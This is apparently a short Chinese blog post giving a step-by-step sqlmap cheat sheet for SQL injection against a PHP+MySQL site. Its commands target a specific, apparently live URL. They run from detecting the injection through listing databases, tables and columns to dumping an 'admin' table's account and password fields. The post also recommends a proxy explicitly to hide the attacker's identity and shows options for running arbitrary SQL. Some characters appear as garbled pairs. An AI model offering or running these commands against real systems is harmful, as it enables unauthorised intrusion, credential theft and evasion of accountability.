sqlmap是一個灰常強大的sql注入檢測與輔助工具，但是由于沒有圖形界面，基本上用起來比較麻煩，導致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面，我自己也是把很多語句貼到了一個記事本里面用，其實真正用起來也就5,6句，也不會太復雜，下文以php+mysql為例：

檢查注入點sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列數(shù)據(jù)庫信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定庫名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定庫名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定庫名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有幾個參數(shù)可能會用到，直接加在***面就可以了，更多詳細參數(shù)見官方文檔：

--cookie=COOKIE 在需要登錄的地方，需要登錄后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份，比如使用goagent等

--sql-query=QUERY 執(zhí)行一個sql語句，不一定支持

過程的幾張圖如下：